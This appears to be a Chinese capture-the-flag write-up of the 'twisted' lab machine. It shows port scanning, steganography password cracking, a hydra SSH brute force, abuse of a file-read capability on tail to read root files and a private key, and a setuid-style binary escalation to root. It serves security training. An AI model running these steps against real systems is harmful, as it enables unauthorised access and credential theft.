信息搜集
主机扫描
aep-scan -l端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.254.27
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 03:44 EDT
Nmap scan report for 192.168.254.27
Host is up (0.00043s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.2
2222/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
MAC Address: 08:00:27:5B:90:01 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
80端口
发现两张猫咪图片,提示说藏有东西,于是猜测隐写,直接全部下载下来
┌──(root㉿kali)-[~]
└─# stegseek '/home/kali/Desktop/Untitled'
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "sexymama"
[i] Original filename: "mateo.txt".
[i] Extracting to "Untitled.out".
┌──(root㉿kali)-[~/cat/1]
└─# stegseek '/home/kali/Desktop/Untitled.jpeg'
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: "westlife"
[i] Original filename: "markus.txt".
[i] Extracting to "Untitled.jpeg.out".
发现很多字符密码,但没有一一对应,于是做成字典爆破
Matthew
sexymama
markus
Westlife
markuslovesbonita
thisismypassword > pass.txt利用九头蛇爆破
┌──(root㉿kali)-[~]
└─# hydra -L pass.txt -P pass.txt ssh://192.168.254.27:2222
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-05-26 10:49:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 49 login tries (l:7/p:7), ~4 tries per task
[DATA] attacking ssh://192.168.254.27:2222/
[2222][ssh] host: 192.168.254.27 login: mateo password: thisismypassword
[2222][ssh] host: 192.168.254.27 login: markus password: markuslovesbonita
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-05-26 10:49:27
获取shell
既然已经发现了用户,呢么直接开始ssh登录,搜集信息
mateo
mateo@twisted:~$ cat note.txt
/var/www/html/gogogo.wav
发现一个音频,听起来是一段摩斯,利用工具,发现是fake,骗你用的,嘁markus
发现一个note.txt,存在id_rsa,cat无法读取,看有没有其他方法,
markus@twisted:~$ cat note.txt
Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.通过老步骤,发现tail可一执行
/usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep
这个表达式的意思是为 /usr/bin/tail 命令设置 cap_dac_read_search 权限,使其可以忽略文件的读权限检查并实际生效。通过这种方式,tail 命令可以读取本来无权访问的文件。那么意味着我们可以直接使用这个文件读取重要文件,比如
markus@twisted:/tmp$ tail /root/root.txt
HMVwhereismycat提权
既然这样我们也能读取我们的id_rsa的文件内容
tail -n 50 /var/cache/apt/id_rsa
显示文件的左后50行,
vi id_rsa
chmod 600 id_rsa
ssh -i id_rsa bonita@127.0.0.1 -p 2222
运行beroot,发现需要root,于是下载下来看看,分析发现当输入5880,可以执行/bin/bash,获取权限
知识点
- /usr/sbin/getcap -r / 2>/dev/null命令的使用
- 逆向文件分析